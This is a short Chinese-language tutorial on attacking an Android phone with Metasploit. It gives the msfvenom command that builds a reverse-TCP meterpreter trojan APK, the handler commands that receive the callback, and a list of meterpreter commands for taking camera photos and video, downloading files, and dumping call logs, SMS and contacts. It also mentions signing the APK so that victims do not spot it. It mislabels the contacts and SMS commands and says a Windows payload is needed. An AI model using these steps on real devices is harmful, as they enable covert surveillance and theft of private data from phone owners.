Metasploit之渗透安卓实战

Metasploit之渗透安卓实战

 
在之前的Metaspoloit使用中都是在Windows系统中，因为渗透的是Windows系统，所以选用了“windows/meterpreter/reverse_tcp”模块。
而这里需要渗透安卓系统了，就选用“android/meterpreter/reverse_tcp”模块。
那么对于kali-linux连接木马的方式还是和之前的一样，利用“exploit/multi/handler”
并且，同样需要选用“windows/meterpreter/reverse_tcp”的PAYLOAD
这里假设我的测试环境
kali-linux： 192.168.2.146
安卓模拟环境：192.168.2.107

 

一、生成远程安卓木马

msfconsole
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=4444 R > payload.apk

命令解析：
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机（kali-linux的IP）
LPORT 设置用来接收反弹连接的端口（kali-linux的端口）
R 设置文件格式
Location 要保存的文件位置–>/root/Desktop/是桌面，没有目录表示当前系统Home目录下
PS：对于目前的安卓系统安全机制的考虑，因为没有签名证书可能导致无法安装或易被受害者识破
那么，签名证书的制作可以查看参考文献资料

 

二、开启metasploit，并且开启相关连接

msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.2.146
set LPORT 4444
exploit

 

三、meterpreter连接

 安卓手机安装并且打开木马后会返回我们一个meterpreter连接,那么我们可以使用以下的一些常用的命令:

cd -->目录切换，命令：cd / 切换到根目录

search -->搜索文件，命令：search text.jpg
download -->下载文件，命令：download test.jpg
webcam_list -->查看摄像头列表，因为手机都是前置和后置摄像头了
webcam_snap -->拍照一张，需要选用前置或者后置摄像头，命令：webcam_snap -i 1
webcam_stream -->开启摄像头视频监控，同上，命令：webcam_stream -i 1
安卓系统相关命令：
check_root -->查看当前安卓是否已经root
dump_calllog -->下载通话记录
dump_contacts -->下载短信记录
dump_sms -->下载通讯录
geolocate -->利用谷歌地图定位（需要安装谷歌地图）